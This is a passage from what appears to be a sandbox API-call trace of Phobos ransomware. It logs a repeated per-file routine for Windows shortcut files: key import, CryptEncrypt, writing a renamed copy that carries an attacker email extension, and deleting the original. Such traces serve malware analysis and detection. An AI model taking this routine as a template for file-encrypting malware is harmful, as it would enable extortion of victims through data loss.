(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\documents.mydocs"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.827] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0201.827] CloseHandle (hObject=0x178) returned 1 [0201.827] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.828] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1238) returned 1 [0201.828] CloseHandle (hObject=0x178) returned 1 [0201.828] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk")) returned 0x2020 [0201.828] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.828] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.828] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.829] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.829] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.829] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4d6, lpOverlapped=0x0) returned 1 [0201.877] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4e0, dwBufLen=0x4e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4e0) returned 1 [0201.877] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4e0, lpOverlapped=0x0) returned 1 [0201.878] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0201.878] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.878] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0201.878] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.878] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0201.878] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.878] CloseHandle (hObject=0x178) returned 1 [0201.878] CloseHandle (hObject=0x124) returned 1 [0201.878] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk")) returned 1 [0201.879] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.880] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1262) returned 1 [0201.880] CloseHandle (hObject=0x124) returned 1 [0201.880] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk")) returned 0x20 [0201.880] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.880] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.880] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.880] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.880] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.881] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.881] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.881] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4ee, lpOverlapped=0x0) returned 1 [0202.195] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4f0, dwBufLen=0x4f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4f0) returned 1 [0202.195] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4f0, lpOverlapped=0x0) returned 1 [0202.196] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0202.196] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.196] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0202.196] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.196] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0202.196] CryptDestroyKey (hKey=0xa328e8) returned 1 [0202.196] CloseHandle (hObject=0x124) returned 1 [0202.196] CloseHandle (hObject=0x178) returned 1 [0202.197] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk")) returned 1 [0202.198] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0202.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.199] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1280) returned 1 [0202.199] CloseHandle (hObject=0x178) returned 1 [0202.199] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk")) returned 0x20 [0202.199] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.199] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.199] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.200] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0202.200] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.201] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x500, lpOverlapped=0x0) returned 1 [0202.205] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x510, dwBufLen=0x510 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x510) returned 1 [0202.205] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x510, lpOverlapped=0x0) returned 1 [0202.206] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0202.206] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.206] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0202.206] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.206] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0202.206] CryptDestroyKey (hKey=0xa328e8) returned 1 [0202.206] CloseHandle (hObject=0x178) returned 1 [0202.206] CloseHandle (hObject=0x124) returned 1 [0202.207] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk")) returned 1 [0202.208] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0202.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.209] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=262) returned 1 [0202.209] CloseHandle (hObject=0x124) returned 1 [0202.209] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk")) returned 0x20 [0202.209] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.209] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.209] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.211] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0202.211] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.211] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x106, lpOverlapped=0x0) returned 1 [0202.211] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110, dwBufLen=0x110 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110) returned 1 [0202.211] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x110, lpOverlapped=0x0) returned 1 [0202.212] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0202.212] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.212] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30, dwBufLen=0x30 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30) returned 1 [0202.212] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.212] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe2, lpOverlapped=0x0) returned 1 [0202.212] CryptDestroyKey (hKey=0xa328e8) returned 1 [0202.212] CloseHandle (hObject=0x124) returned 1 [0202.212] CloseHandle (hObject=0x178) returned 1 [0202.213] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk")) returned 1 [0202.214] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0202.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.215] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=262) returned 1 [0202.215] CloseHandle (hObject=0x178) returned 1 [0202.215] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk")) returned 0x20 [0202.215] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0202.215] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.215] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0202.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0202.216] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0202.216] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0202.216] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x106, lpOverlapped=0x0) returned 1 [0202.217] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110, dwBufLen=0x110 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110) returned 1 [0202.217] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x110, lpOverlapped=0x0) returned 1 [0202.218] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0202.218] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, 